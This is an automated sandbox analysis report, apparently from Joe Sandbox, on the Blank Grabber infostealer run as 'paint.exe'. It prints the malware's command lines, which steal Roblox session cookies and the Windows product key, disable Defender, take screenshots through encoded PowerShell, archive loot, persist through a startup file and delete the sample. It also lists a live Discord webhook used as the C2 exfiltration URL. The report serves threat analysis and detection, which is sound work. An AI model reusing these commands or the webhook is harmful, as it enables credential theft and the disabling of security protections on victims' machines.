        • tree.com (PID: 9132 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 9152 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 9168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7776 cmdline: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7532 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8084 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 6596 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 1852 cmdline: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 5956 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\S7zJV.zip" *" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • rar.exe (PID: 7908 cmdline: C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\S7zJV.zip" * MD5: 9C223575AE5B9544BC3D69AC6364F75E)
      • cmd.exe (PID: 7716 cmdline: C:\Windows\system32\cmd.exe /c "wmic os get Caption" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 8180 cmdline: wmic os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8092 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 8680 cmdline: wmic computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8512 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 8840 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8528 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8456 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 8904 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 8688 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8852 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7668 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 9052 cmdline: C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\paint.exe"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 9064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • PING.EXE (PID: 7544 cmdline: ping localhost -n 3 MD5: 2F46799D79D22AC72C241EC0322B011D)
  • cleanup
{"C2 url": "https://discord.com/api/webhooks/1325366706595561574/vQDeUuP3YNG10jqpqcayt14YabeOslGKlq6YRX-VMaSv1X0716_bmr9KcFyMQ8vNYrim"}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\_MEI67162\rarreg.keyJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000003.1673300933.0000023393145000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
      00000001.00000003.2003846185.000002077225D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
        00000001.00000002.2008785776.0000020771690000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
          00000000.00000003.1673300933.0000023393147000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
            00000001.00000002.2008427127.0000020771390000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
              Click to see the 4 entries

              System Summary

              barindex
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\paint.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\paint.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\paint.exe", ParentImage: C:\Users\user\Desktop\paint.exe, ParentProcessId: 2132, ParentProcessName: paint.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\paint.exe'", ProcessId: 4588, ProcessName: cmd.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\paint.exe", ParentImage: C:\Users\user\Desktop\paint.exe, ParentProcessId: 2132, ParentProcessName: paint.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 3584, ProcessName: cmd.exe
              Source: Process startedAuthor: @ROxPinTeddy: Data: Command: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\S7zJV.zip" *", CommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\S7zJV.zip" *", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\paint.exe", ParentImage: C:\Users\user\Desktop\paint.exe, ParentProcessId: 2132, ParentProcessName: paint.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI67162\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\S7zJV.zip" *", ProcessId: 5956, ProcessName: cmd.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Source: Process startedAuthor: Ilya Krestinichev: Data: Command: C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\paint.exe"", CommandLine: C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\paint.exe"", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\paint.exe", ParentImage: C:\Users\user\Desktop\paint.exe, ParentProcessId: 2132, ParentProcessName: paint.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\paint.exe"", ProcessId: 9052, ProcessName: cmd.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\paint.exe, ProcessId: 2132, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
              Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\u3oq5ojt\u3oq5ojt.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\u3oq5ojt\u3oq5ojt.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 